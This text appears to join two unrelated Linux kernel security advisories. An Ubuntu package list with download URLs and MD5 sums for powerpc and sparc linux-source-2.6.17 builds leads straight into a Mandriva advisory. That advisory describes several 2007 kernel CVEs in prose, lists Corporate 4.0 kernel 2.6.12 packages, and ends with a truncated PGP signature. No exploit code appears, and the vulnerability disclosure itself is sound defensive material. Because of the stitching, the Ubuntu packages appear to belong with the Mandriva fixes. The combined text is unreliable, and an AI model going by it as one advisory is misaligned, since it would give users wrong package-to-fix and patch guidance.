http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:   225682 0d1c7a72f611eec4e336faac7dd9893d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:    44588 8ee2bf4db312823e9e19fc0701170839
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:    40180 af520f3f82ae6373ecf050f6a0515bc6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fs-common-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:     1960 430d783ddeaa411aa03723cb931f03a0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fs-common-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:     2232 a4ada90e401800c697cc60b0e396e932
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/hfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:    79296 02e167b7c3776269d66103ca8e2d62d6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/hfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:    86612 82fb17eba860416a510aa5d7b050c784
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:   110262 c7dc1577ba7760981d7db9598a40137d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:   127800 53fbdb953cb85dede0a7e264330927cc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:    55672 be221f80a184537ce3a0f2fa02b6824a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:    61924 0ea661a0734d702381f0903e4296c237
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:   141124 47ad113d4a43d19a08b81576ad604089
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:   158556 5202300b269311ce4714754eff59efad
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:   314556 391adbaa26d02a6890c6b28aef0020fd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:   289916 4f5665cc6d901f0d2d7fd35f3db4e615
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:   113204 86bd467218a4316dde6d8e2960f4ca9d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:   116436 2b0ea85fd8ec23b7d8a7b626e7347d27
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:  2052172 da6d033827867bd628c714edff14a8b9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:  2771818 3c384239bea32e48f696d7d30f847746
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-powerpc-smp_2.6.17.1-12.39_powerpc.deb
  Size/MD5:   915864 d03bcf64df6e31149bd4b019ed60deb2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-powerpc64-smp_2.6.17.1-12.39_powerpc.deb
  Size/MD5:   920336 2162b15d8aea5ee373c22c874a22526b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-powerpc_2.6.17.1-12.39_powerpc.deb
  Size/MD5:   917858 516bcad3769297d3eef7f6d607bf35a5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.39_powerpc.deb
  Size/MD5:  7445094 549c0326666219ba0086efade9610992
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-powerpc-smp_2.6.17.1-12.39_powerpc.deb
  Size/MD5: 22719040 66394a300073c7ba74ef5c80d8bb65d0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-powerpc64-smp_2.6.17.1-12.39_powerpc.deb
  Size/MD5: 24606070 ec3fa905f30188ea9e833087c913f7af
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-powerpc_2.6.17.1-12.39_powerpc.deb
  Size/MD5: 22427416 80377ed086d753ab3c77f7a402fea432
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-powerpc-smp_2.6.17.1-12.39_powerpc.deb
  Size/MD5:  2042736 accb89985e59b51a14a26a2bbf0c2beb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-powerpc64-smp_2.6.17.1-12.39_powerpc.deb
  Size/MD5:  2589636 3113e56b1500407f0395c4997cbb2fc0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-powerpc_2.6.17.1-12.39_powerpc.deb
  Size/MD5:  1969034 689cc515c3fe9b9dd65c6340fb7122ea
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.39_powerpc.deb
  Size/MD5:  1729872 c6ee6d64e4fcdc422c24a20f756140a5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:    17430 091a6b837b4f03a4e01d085d382aa5b0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:    17360 d81498196e5cc7ec40c6fcae5e0f8b57
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:   258062 7cdc8ec029091506a1b39475c252e4dc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:   297904 bbb079ce725c0f5b5db736c2e034ac9a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:   239038 6144f028649a23faf13a4b4611c811e9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:   266536 19c8662f8f7ee669e3f618cbc68b4fd5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:  1048448 2d219f4cc488a3a5de3534fcc003b4c3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:  1048588 65293d6fcac990bda20e84635efa96aa
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:  2098394 4fecae0ee0d1ad474f2e9b440bb50c76
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:  2331766 fe68e08970accf65a0d5106e639f87ea
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:   233858 fbd8ae40c9e092e8f6ef3ef89b5fa034
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:   214704 d1c180af3cee5d80a0c6e045ab7cca66
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:    12696 46e06747d49b64cce513633b79b00111
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:    13316 61b3b6a0c84695365661f6ea8697d7f0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:    83240 0dc567f9c97d271aebe807ec017454a4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:    97162 85d44740ed633723dac4810b60a4941a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:    71160 cc8f7ddf940a1dc28540b951d600494a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:    84188 7c3bcdb3c9f430a83fe217c3f608e987
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:     6346 501b4f81087de783cb047beccd821e16
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:     6890 3fc743c702743c64626afb149611772e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:    57002 13f8831879808c97eff7bd30fac4ffd9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:    69202 ab86b925064cd257a09f4c0b18ecfcc5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:   128618 15deac4a700effc177eb788d2ab7a483
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:   156242 50b0643e2ed32e9155272f20acd92379
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:   109764 5e9925bddb96efdb84a8c719c4815495
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:   133040 aecf93580b62a1b25e346595c0a232e0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:    86612 20f2a685e18d0ad56f8d34d0343d921e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:    94826 01743e049cfef3843e781189aa3d1497
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:  1511478 4660787ea1a93756c0c0dd869c221023
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:  1521588 d70e9fa47808f171ac95c169c6e29177
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:   101306 c55cc8f4ff26c9e82f2f3ebf3b81388c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:   115560 37bdd2239d7c633267fe0441ed93f988
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:    12206 36f00173ddd7427b7540f81a56503c1d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:    14294 c4c8a72bc8944313aac2200cc04e97ae
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:    84678 1dd8aa1c4555a8459dae275aaac03aa9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:    87956 19bca79086e039ba65e5a72d8d359f75
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:    37278 c2bd19dca9c56862aa93460ccb8751ae
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:    40252 1483517a7607b74fa6fcbcc22ab5fdd6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:   139996 26c86dc67c3a654d8f1ec87ffa2fca28
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:   161492 ebe28ec47f8f488e2235d7913a02d046
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:    49996 ec1ed33de95bdb1c37aa9a9bd34bd69f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:    54876 7e9284172eac7124fa71724d66d1b636
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:   308218 7f86cf616bb7ab1db75697f678ea6acd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:   330232 403f447d858dbe8c55c33563b7cf1eb5

sparc architecture (Sun SPARC/UltraSPARC)

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb
  Size/MD5:    50734 bb2efbe1b281982ecde5580ab6fe3b50
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb
  Size/MD5:     2388 5b3124294cced1f9c01bef0f54b3e6be
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb
  Size/MD5:    40670 d5285a397b2cfbfa99b5c31547a1630d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb
  Size/MD5:   112228 228400863e74dde11225e875b61afc14
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb
  Size/MD5:    41754 fc6f0b3e063713229519155b8084a67d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb
  Size/MD5:   105100 b9ea17239e0badbbebcccd6fbc32e802
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb
  Size/MD5:     6860 3fb7358ac5a7381d52295f06bc623ab7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb
  Size/MD5:   147570 fa000eaaca4c2d10302b5a0d2bc69cb4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb
  Size/MD5:  1840714 1842940403b8e2e931a44eb01359bfe6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-sparc64-smp_2.6.17.1-12.39_sparc.deb
  Size/MD5:   812940 f9a5e0636476d16cec2229e413043766
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-sparc64_2.6.17.1-12.39_sparc.deb
  Size/MD5:   808176 2b5aebefa48c28a7c5d4209aab7033cb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.39_sparc.deb
  Size/MD5:  7424164 c74ba68d7311108b74006d980dd10dde
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-sparc64-smp_2.6.17.1-12.39_sparc.deb
  Size/MD5: 15626704 1e4b8d0931b65f611d65703b0ec0f36e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-sparc64_2.6.17.1-12.39_sparc.deb
  Size/MD5: 15290014 3a50dbd38c7755fe3ff318b060cc1220
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-sparc64-smp_2.6.17.1-12.39_sparc.deb
  Size/MD5:  2172050 ba0f7981b554898adfc969fb69ccf64b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-sparc64_2.6.17.1-12.39_sparc.deb
  Size/MD5:  2086206 09f393da6d5146f7dce916f54f3d7691
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.39_sparc.deb
  Size/MD5:  1813150 e3b3905635f967a48624137edcdbb27b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb
  Size/MD5:     7404 ea3a9c628a0abb24538ddbe64f19492e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb
  Size/MD5:   263986 2619285b2ab85918a65c1e23aac157b4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb
  Size/MD5:   229210 dc1d9b2fd9a2bb983a928a1c901232cf
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb
  Size/MD5:  1048450 a8621025ef6733f91c55ac4faca6e969
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb
  Size/MD5:  1922014 0d453425af2422b8cdbf51befa1549c1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb
  Size/MD5:     9916 70e259e5700fbdb85527cded08f64ed6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb
  Size/MD5:    40360 789d5ef17ef193756a42a6b9fc0aa33d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb
  Size/MD5:     8718 501c7f5bdcbfa3d4cee868f09173ccc3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb
  Size/MD5:    59388 36b36d79b6c3ac4ae081211a23ceb9bb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb
  Size/MD5:   162874 6a197706de5114d0fab66cae0bd63ffc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb
  Size/MD5:    66650 89d73eaf9ae8e6cf12ef9eb419bcec66
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb
  Size/MD5:   855816 f89556200a52867a2c1a02d2ca43ac99
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb
  Size/MD5:    51828 f226534e06e281c35a9c46e7fc163f2e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb
  Size/MD5:    38424 9896fecebac71aa51c4770188e89a9b2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb
  Size/MD5:   283108 4ef6014b80d06c5db64affc1b671ee8a

.

Details follow:

A buffer overflow was discovered in the Moxa serial driver. A local user could manipulate this to send signals to processes they would not normally have access to.

The nf_conntrack function in netfilter did not set nfctinfo during reassembly of fragmented packets, which left the default value as IP_CT_ESTABLISHED and could allow remote attackers to bypass certain rulesets using IPv6 fragments (CVE-2007-1497).

A typo in the Linux kernel caused RTA_MAX to be used as an array size instead of RTN_MAX, which lead to an out of bounds access by certain functions (CVE-2007-2172).

A stack-based buffer overflow in the random number generator could allow local root users to cause a denial of service or gain privileges by setting the default wakeup threshold to a value greater than the output pool size (CVE-2007-3105).

The Linux kernel allowed local users to send arbitrary signals to a child process that is running at higher privileges by causing a setuid-root parent process to die which delivered an attacker-controlled parent process death signal (PR_SET_PDEATHSIG) (CVE-2007-3848).

The IA32 system call emulation functionality, when running on the x86_64 architecture, did not zero extend the eax register after the 32bit entry path to ptrace is used, which could allow local users to gain privileges by triggering an out-of-bounds access to the system call table using the %RAX register (CVE-2007-4573).

In addition to these security fixes, other fixes have been included such as:

  • The 3w-9xxx module was updated to version 9.4.1.2, adding support for 9650SE
  • Fixed the build of e1000-ng
  • Added NIC support for MCP55
  • Added LSI Logic MegaRAID SAS 8300XLP support

To update your kernel, please follow the directions located at:

http://www.mandriva.com/en/security/kernelupdate


References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7203 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1497 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2172 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2242 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2453 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2525 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2875 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2876 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3105 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3513 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3848 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4308 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4573


Updated Packages:

Corporate 4.0: 3657c208eeb3c079d9ff0a4ca55a9b03 corporate/4.0/i586/kernel-2.6.12.32mdk-1-1mdk.i586.rpm 0cd8fd1c504f3365fe503c4fd627b6ea corporate/4.0/i586/kernel-BOOT-2.6.12.32mdk-1-1mdk.i586.rpm fbabe3497810452a0052bc67a5fb4f29 corporate/4.0/i586/kernel-doc-2.6.12.32mdk-1-1mdk.i586.rpm 02edfc1bbb2bd826c4a9152d670cc2cc corporate/4.0/i586/kernel-i586-up-1GB-2.6.12.32mdk-1-1mdk.i586.rpm 88b0876de92beff866bb91ba57be0a70 corporate/4.0/i586/kernel-i686-up-4GB-2.6.12.32mdk-1-1mdk.i586.rpm e813926dc184e911deb62a1e34cff8ed corporate/4.0/i586/kernel-smp-2.6.12.32mdk-1-1mdk.i586.rpm a8011ebbe529551463f87cc22f3da22f corporate/4.0/i586/kernel-source-2.6.12.32mdk-1-1mdk.i586.rpm 813ba955a1e9b5ff9834aeebbe477a93 corporate/4.0/i586/kernel-source-stripped-2.6.12.32mdk-1-1mdk.i586.rpm be08ad30fbc3988f654c1532e73fc330 corporate/4.0/i586/kernel-xbox-2.6.12.32mdk-1-1mdk.i586.rpm 5894ac0216cf38203d2002a19db70c15 corporate/4.0/i586/kernel-xen0-2.6.12.32mdk-1-1mdk.i586.rpm 62d5b93083df571edbf8785bc754dd6e corporate/4.0/i586/kernel-xenU-2.6.12.32mdk-1-1mdk.i586.rpm 423fe3296a56ff845fd643890663cdee corporate/4.0/SRPMS/kernel-2.6.12.32mdk-1-1mdk.src.rpm

Corporate 4.0/X86_64: a51bd78ce00e65f7521625c8c67605f0 corporate/4.0/x86_64/kernel-2.6.12.32mdk-1-1mdk.x86_64.rpm 8d407ed81be714537c2c957918cedfed corporate/4.0/x86_64/kernel-BOOT-2.6.12.32mdk-1-1mdk.x86_64.rpm 730c0bae9b443e5f9d8cb3c8a3486488 corporate/4.0/x86_64/kernel-doc-2.6.12.32mdk-1-1mdk.x86_64.rpm 06391bd475945e8a8b76dcb33989fc83 corporate/4.0/x86_64/kernel-smp-2.6.12.32mdk-1-1mdk.x86_64.rpm bc9c9a881f18b5c2f892684aaeee84cf corporate/4.0/x86_64/kernel-source-2.6.12.32mdk-1-1mdk.x86_64.rpm b0240b751985babe1aabda9c9e231a92 corporate/4.0/x86_64/kernel-source-stripped-2.6.12.32mdk-1-1mdk.x86_64.rpm b1b4750de7daf9cb12ed0057a8851f32 corporate/4.0/x86_64/kernel-xen0-2.6.12.32mdk-1-1mdk.x86_64.rpm 915a8eb87a9fc0c0deab5e696f27c59b corporate/4.0/x86_64/kernel-xenU-2.6.12.32mdk-1-1mdk.x86_64.rpm 423fe3296a56ff845fd643890663cdee corporate/4.0/SRPMS/kernel-2.6.12.32mdk-1-1mdk.src.rpm


To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com


Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (GNU/Linux)

